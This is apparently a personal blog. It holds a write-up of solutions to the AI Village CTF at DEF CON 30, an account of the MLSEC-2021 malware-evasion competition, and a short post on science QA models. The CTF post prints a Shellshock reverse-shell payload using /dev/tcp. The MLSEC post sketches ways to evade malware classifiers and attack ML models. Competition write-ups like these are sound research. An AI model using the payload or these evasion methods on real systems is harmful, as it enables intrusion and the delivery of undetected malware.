Tuesday, September 27, 2022

AI Village Capture the Flag @ DEFCON write up

 In August 2022 I had the chance to participate in an AI-themed CTF collocated with the DEF CON 30 security (hacking) conference. This was particularly interesting since it was presented in a novel format as a Kaggle competition where the leaderboard was ranked based on the points that each of the discovered flags was providing. Despite entering the competition in its latest stage I did manage to solve all the challenges but two, therefore achieving the second best score (although my final ranking was lower due to submission times being used as tie-breakers). No one was able to find the last flag corresponding to the Crop-2 challenge until after the CTF ended.

Overall, this was quite different from previous adversarial ML competitions and aligned more with the type of ML-related challenges seen in traditional CTFs. My solutions in order to achieve the flags were as follows:

  • Hotdog: Submitted a picture of a hotdog.
  • Math_1-4: Brute forced by guessing the upper and lower bounds of the expected solutions.
  • Honor Student: Solved via hill-climbing by incrementally adding noise.
  • Wifi: Obtained the flag by using argmin(embeddings) as character indexes.
  • Bad to Good: Found that negative demerits were not properly handled and that did the trick.
  • Baseball: Solved via hill-climbing after guessing the distribution for that player through grid search.
  • Inference: The hint in the challenge description gave it away. Since I knew the number of characters just had to try difference combinations until D3FC0N showed up as accepted.
  • Leakage: Passed the username as input to the LSTM which returned the password.
  • Forensics: The flag was in the model itself which could be accessed via model.summary().
  • Token: This was a tokenizer desync attack. Replacing BLANK was the solution.
  • Deepfake: Submitted random videos from YouTube until found one that was accepted as valid.
  • Murderbots: Identified power and temperature values via anomaly detection (deviations from the mean) that were likely human related. That gave me 9 indexes and just had to guess the last one manually.
  • Hotterdog/Theft/Salt: Generated adversarial examples with the provided models using FGS.
  • Crop_1: Generated the solution image via hill-climbing:

  • WAF: The hints led me to a well known exploit used by Crypto mining campaigns. Then it was all trial and error to figure out which portions were deemed as malicious. The final step involved obfuscating the b64 with spaces.
    • () { :;}; /bin/bash -c "bash -i >& /dev/tcp/ 0<&1
  • Secret Sloth: Could not solve this one, although I was pretty close and located the exact place where the flag was and decoded some of the letters. It could have been solved via brute force as some participants shared later :(

  • Crop_2: Ran out of time so I could not even attempt to solve this one.

Thursday, March 17, 2022

Defending and attacking ML Malware Classifiers for Fun and Profit: 2x prize winner at MLSEC-2021

MLSEC (Machine Learning Security Evasion Competition) is an initiative sponsored by Microsoft and partners CUJO AI, NVIDIA, VMRay, and MRG Effitas with the purpose of raising awareness of the expanding attack surface which is now also affecting AI-powered systems. 

In its 3rd edition the competition allowed defenders and attackers to exercise their security and machine learning skills under a plausible threat model: evading antimalware and anti-phishing filters. In the competition, defenders aimed to detect evasive submissions by using machine learning (ML), and attackers attempted to circumvent those detections.

The anti-malware track included two parts: the defensive part focused on creating anti-malware models that were able to withstand adversarial attacks with certain criteria regarding FPR/TPR and an offensive part in which competitors had to bypass the defender models by modifying a set of 50 malware samples provided by the organizers in a way that would still run and produce the same IOCs in an sandboxed environment.

Defensive anti-malware track

PE files have a very large feature space to defend and (even with droppers disallowed this year) it was obvious to me that any malware detection model that I could train with reasonable computing power and public training resources would be relatively easy to bypass.  

Taking into account that the feedback loop between submitting a modified malware sample to the MLSEC backend and receiving the execution sandbox results involved a considerable delay (around 1h) and knowing that defeating models in a black box setting would require many queries, I decided to focus on slowing down certain attack paths by aiming for deterrence rather than model robustness. This had the goal of discouraging attackers trying to evade my system with the hypothesis that they will use their resources against easier targets first. 

In order to do that I placed several layers of defense in the submitted "A1" solution: 

  • First, traditional approaches were deployed, such as ensembles trained on SOREL and EMBER datasets using gradient boosted trees. Additional feature engineering was added targeting packers and concealed binaries.
  • Second, PE anomaly detection rules would look for suspicious data in sections and headers that are usually manipulated during adversarial tests.
  • Later, an stateful defense would compare each submitted file with previously convicted files submitted to the system. This has not only the ability to detect adversarial variants but forces attackers to produce substantially different files that still need to run successfully in the sandbox. The comparison method purposely includes only areas which are a priori harder to modify without a packer/dropper approach, such as data and code from the first PE section. 
  • Finally, a moving target defense composed by an ensemble of non-deterministic classifiers that would slightly modify their decision function on each run was placed in order to further confuse attackers. This layer would concede evasions in a non-consistent way, providing contradictory clues about the evasion success (or failure).

These together did relatively well and placed me in a second "in-the-money" position very close to the winning approach:

There were some other "fun" restrictions, like having to pack the defender as a docker image with certain file size and keeping low latency when analyzing files and providing the verdict. In order to do that the docker base image had to be stripped to the max by deleting certain unused libraries and packages by hand, leaving the OS unstable in some cases...

Offensive anti-malware track

There were 6 defender systems unknown to the participants, however considering the fact that there are not many publicly available large-scale malware  datasets  besides  EMBER  and  SOREL,  It wasn't unreasonable to believe that attacks that would successful evade baseline models trained on these datasets should have in principle better chances of evasion, or the very least least a better starting point than targeting the defenders directly using black-box attacks. 

Therefore the chosen strategy was performing a mix of white-box and black-box attacks against EMBER and SOREL baselines while also extracting knowledge from the evaded defender systems in order to manually fine-tune further attacks in an iterative way. 

Black box:

White box:
  • Feature importance of baseline SOREL and EMBER models
  • Lime and SHAP analysis of baseline SOREL and EMBER models:

Other approaches such as PE header fuzzing yielded few but interesting results, such as highlighting the fact that the EMBER feature set makes use of PE header fields ignored by the Windows loader, which opens the door to more interesting adversarial modifications by purposely generating apparently broken PEs which would still run fine in the sandbox. A few more were identified but are left as an exercise to the reader ;).

While droppers were not allowed in this edition, crypters/packers were. I've tried a few and had some moderate success for some malware binaries. The main caveat is that for the cases when the evasion fails the packer stub risks being fingerprinted by stateful defenses. Likewise, several malware samples were either loaders themselves or had some sort of integrity checks. These were probably cherry-picked by the organizers to limit packer effectiveness after their success in previous editions.

Overall, generating non-detected variants was relatively easy, the main challenge was generating variants that would evade detection and execute successfully in the organizers sandbox. I chose not testing the modified malware binaries locally before submission, which forced me to use extra API calls (almost 6 times more than the winning team).

I was ranked second on this track as well, with just 29 evasions less than the winning team.

Overall, the competition was fun and the experimental results quite interesting, but there are some things the organizers may want to address in future editions. For example, defenders FP rate was enforced only considering clean binaries from a Windows system. This caused some controversy as it was possible to submit a defender that would only detect as clean that particular set and everything else as malware. 


amsqr at MLSEC-2021: Thwarting Adversarial Malware Evasion with a Defense-in-Depth



Kipple: Towards accessible, robust malware classification

CC10 - Building & Defending a Machine Learning Malware Classifier: Taking 3rd at MLSEC 2021

Towards Machines that Capture and Reason with Science Knowledge

 In 2015 I took part on a machine learning competition hosted on Kaggle aiming to solve a multiple-question 8th grade science test. At that time there weren't large pretrained models to leverage and (unsurprisingly) best performing models were IR-based that would barely achieve a GPA of 1.0 in the US grading system:

However, several years later (and several thousands of $$$ spent training large Transformers), Allen AI researchers reported in 2020 substantially better results using either BERT or RoBERTa based QA solvers. This major breakthrough means that a QA system leveraging publicly available language models and training data could achieve 90%+ (GPA-4) in a similar 8th grader test:

The success of Transformers in NLP has opened several possibilities unthinkable many years ago, being able not only to solve arbitrary natural language processing tasks but also leading the way to the development of fully AutoNLP solutions that could work without human intervention.


Project Aristo: Towards Machines that Capture and Reason with Science Knowledge

From ‘F’ to ‘A’ on the N.Y. Regents Science Exams: An Overview of the Aristo Project

Prize winning solution to the Kaggle challenge (GitHub)